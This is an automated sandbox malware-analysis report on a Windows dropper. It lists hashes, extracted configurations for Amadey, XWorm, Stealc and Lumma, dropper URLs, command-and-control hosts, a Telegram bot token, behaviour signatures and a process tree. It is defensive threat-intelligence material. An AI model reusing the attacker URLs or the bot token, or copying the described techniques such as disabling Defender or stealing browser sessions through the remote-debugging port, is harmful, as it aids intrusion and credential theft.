Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-02-2025 12:30

General

  • Target

    54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a.exe

  • Size

    2.0MB

  • MD5

    354e5ac5449695bd3e8520e47ba4815e

  • SHA1

    a023339baaea904f78d73c5b440ffa764aa9b6a2

  • SHA256

    54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a

  • SHA512

    ab31ab9d52efb5955003f62ec7d87dd706daf322d154a03bbe3533c385f9802777b1e939b9cfdbe9acd4431e7855907ae0d3c88a89ced8b20fb30a008550d42e

  • SSDEEP

    49152:PyurhZIw1XiVWyvHdT8rXVZJDBw+fsPtoajy/v/FGiLi/0/dN:n0swdTiXBBRsPCRpLiE

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

amadey

Version

5.21

Botnet

a4d2cd

C2

http://cobolrationumelawrtewarms.com

http://�������� jlgenfekjlfnvtgpegkwr.xyz

Attributes
  • install_dir

    a58456755d

  • install_file

    Gxtuum.exe

  • strings_key

    00fadbeacf092dfd58b48ef4ac68f826

  • url_paths

    /3ofn3jf3e2ljk/index.php

rc4.plain

Extracted

Family

xworm

Version

5.0

C2

185.163.204.65:7000

Mutex

SWaSxcOz2FkLWFU7

Attributes
  • install_file

    USB.exe

  • telegram

    https://api.telegram.org/bot7801507553:AAER1leGn_BtfmbwwWVlXFOz-GpclQKTfe0/sendMessage?chat_id=6012304042

aes.plain

Extracted

Family

stealc

Botnet

reno

C2

http://185.215.113.115

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

C2

https://embarkiffe.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Poverty Stealer Payload 1 IoCs
  • Detect Xworm Payload 2 IoCs
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Poverty Stealer

    Poverty Stealer is a crypto and infostealer written in C++.

  • Povertystealer family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 28 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 32 IoCs
  • Uses browser remote debugging 2 TTPs 39 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 56 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 46 IoCs
  • Identifies Wine through registry keys 2 TTPs 28 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 2 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 28 IoCs
  • Suspicious use of SetThreadContext 15 IoCs
  • Drops file in Windows directory 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 30 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 36 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 52 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 37 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a.exe
    "C:\Users\Admin\AppData\Local\Temp\54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:4240
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3872
      • C:\Users\Admin\AppData\Local\Temp\1090525001\8QQOJj9.exe
        "C:\Users\Admin\AppData\Local\Temp\1090525001\8QQOJj9.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:5016
      • C:\Users\Admin\AppData\Local\Temp\1090607001\uXivbut.exe
        "C:\Users\Admin\AppData\Local\Temp\1090607001\uXivbut.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4820
        • C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
          "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4804
          • C:\Users\Admin\AppData\Roaming\10000180100\sha256.exe
            "C:\Users\Admin\AppData\Roaming\10000180100\sha256.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            PID:3232
      • C:\Users\Admin\AppData\Local\Temp\1090673001\9cf701098a.exe
        "C:\Users\Admin\AppData\Local\Temp\1090673001\9cf701098a.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4176
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          4⤵
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4712
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:564
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4820
      • C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe
        "C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4208
        • C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe
          "C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:856
      • C:\Users\Admin\AppData\Local\Temp\1091048001\7tzlyz8.exe
        "C:\Users\Admin\AppData\Local\Temp\1091048001\7tzlyz8.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:4740
      • C:\Users\Admin\AppData\Local\Temp\1091498001\amnew.exe
        "C:\Users\Admin\AppData\Local\Temp\1091498001\amnew.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3104
        • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
          "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
          4⤵
          • Downloads MZ/PE file
          • Checks computer location settings
          • Executes dropped EXE
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3708
          • C:\Users\Admin\AppData\Local\Temp\10010860101\CalcVaults.exe
            "C:\Users\Admin\AppData\Local\Temp\10010860101\CalcVaults.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3152
          • C:\Users\Admin\AppData\Local\Temp\10011850101\604d7d5ad6.exe
            "C:\Users\Admin\AppData\Local\Temp\10011850101\604d7d5ad6.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2272
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
              6⤵
              • Uses browser remote debugging
              • Enumerates system info in registry
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:3828
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffabba2cc40,0x7ffabba2cc4c,0x7ffabba2cc58
                7⤵
                  PID:4812
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1916,i,6489294424353501110,8166957818608267834,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1908 /prefetch:2
                  7⤵
                    PID:3024
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2136,i,6489294424353501110,8166957818608267834,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2172 /prefetch:3
                    7⤵
                      PID:1928
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2240,i,6489294424353501110,8166957818608267834,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2428 /prefetch:8
                      7⤵
                        PID:4040
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,6489294424353501110,8166957818608267834,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3176 /prefetch:1
                        7⤵
                        • Uses browser remote debugging
                        PID:4940
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3184,i,6489294424353501110,8166957818608267834,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3224 /prefetch:1
                        7⤵
                        • Uses browser remote debugging
                        PID:1868
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4284,i,6489294424353501110,8166957818608267834,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4576 /prefetch:1
                        7⤵
                        • Uses browser remote debugging
                        PID:4432
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4724,i,6489294424353501110,8166957818608267834,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4456 /prefetch:8
                        7⤵
                          PID:2204
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4768,i,6489294424353501110,8166957818608267834,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4784 /prefetch:8
                          7⤵
                            PID:4380
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4788,i,6489294424353501110,8166957818608267834,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4672 /prefetch:8
                            7⤵
                              PID:5204
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4948,i,6489294424353501110,8166957818608267834,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4980 /prefetch:8
                              7⤵
                                PID:5332
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                              6⤵
                              • Uses browser remote debugging
                              • Enumerates system info in registry
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                              • Suspicious use of FindShellTrayWindow
                              PID:5548
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffabba346f8,0x7ffabba34708,0x7ffabba34718
                                7⤵
                                • Checks processor information in registry
                                • Enumerates system info in registry
                                • Suspicious behavior: EnumeratesProcesses
                                PID:5564
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,14773686852399795026,16491204681817268293,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
                                7⤵
                                  PID:5868
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,14773686852399795026,16491204681817268293,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
                                  7⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:5876
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,14773686852399795026,16491204681817268293,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2812 /prefetch:8
                                  7⤵
                                    PID:5892
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2116,14773686852399795026,16491204681817268293,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
                                    7⤵
                                    • Uses browser remote debugging
                                    PID:6096
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2116,14773686852399795026,16491204681817268293,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
                                    7⤵
                                    • Uses browser remote debugging
                                    PID:6108
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2116,14773686852399795026,16491204681817268293,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:1
                                    7⤵
                                    • Uses browser remote debugging
                                    PID:2200
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2116,14773686852399795026,16491204681817268293,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4868 /prefetch:1
                                    7⤵
                                    • Uses browser remote debugging
                                    PID:2996
                              • C:\Users\Admin\AppData\Local\Temp\10011860101\8e20ce9b96.exe
                                "C:\Users\Admin\AppData\Local\Temp\10011860101\8e20ce9b96.exe"
                                5⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of SetThreadContext
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4656
                                • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                  "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                  6⤵
                                  • Downloads MZ/PE file
                                  • System Location Discovery: System Language Discovery
                                  PID:4856
                          • C:\Users\Admin\AppData\Local\Temp\1091546001\04609c03b9.exe
                            "C:\Users\Admin\AppData\Local\Temp\1091546001\04609c03b9.exe"
                            3⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious behavior: EnumeratesProcesses
                            PID:4612
                          • C:\Users\Admin\AppData\Local\Temp\1091548001\5b860991d2.exe
                            "C:\Users\Admin\AppData\Local\Temp\1091548001\5b860991d2.exe"
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            PID:4404
                            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:5572
                          • C:\Users\Admin\AppData\Local\Temp\1091549001\62be2e4ee5.exe
                            "C:\Users\Admin\AppData\Local\Temp\1091549001\62be2e4ee5.exe"
                            3⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:5292
                          • C:\Users\Admin\AppData\Local\Temp\1091550001\01d829fe61.exe
                            "C:\Users\Admin\AppData\Local\Temp\1091550001\01d829fe61.exe"
                            3⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:6128
                          • C:\Users\Admin\AppData\Local\Temp\1091552001\d560328bd9.exe
                            "C:\Users\Admin\AppData\Local\Temp\1091552001\d560328bd9.exe"
                            3⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            PID:5640
                            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                              4⤵
                              • Downloads MZ/PE file
                              PID:3836
                          • C:\Users\Admin\AppData\Local\Temp\1091551001\c32b357abc.exe
                            "C:\Users\Admin\AppData\Local\Temp\1091551001\c32b357abc.exe"
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious use of AdjustPrivilegeToken
                            PID:6084
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                              4⤵
                              • Suspicious use of SetThreadContext
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1360
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                5⤵
                                  PID:5444
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3568
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                4⤵
                                  PID:1376
                              • C:\Users\Admin\AppData\Local\Temp\1091553001\ftS1RPn.exe
                                "C:\Users\Admin\AppData\Local\Temp\1091553001\ftS1RPn.exe"
                                3⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                PID:5344
                              • C:\Users\Admin\AppData\Local\Temp\1091554001\DF9PCFR.exe
                                "C:\Users\Admin\AppData\Local\Temp\1091554001\DF9PCFR.exe"
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • System Location Discovery: System Language Discovery
                                PID:4436
                                • C:\Users\Admin\AppData\Local\Temp\1091554001\DF9PCFR.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1091554001\DF9PCFR.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:5884
                              • C:\Users\Admin\AppData\Local\Temp\1091555001\uXivbut.exe
                                "C:\Users\Admin\AppData\Local\Temp\1091555001\uXivbut.exe"
                                3⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:5660
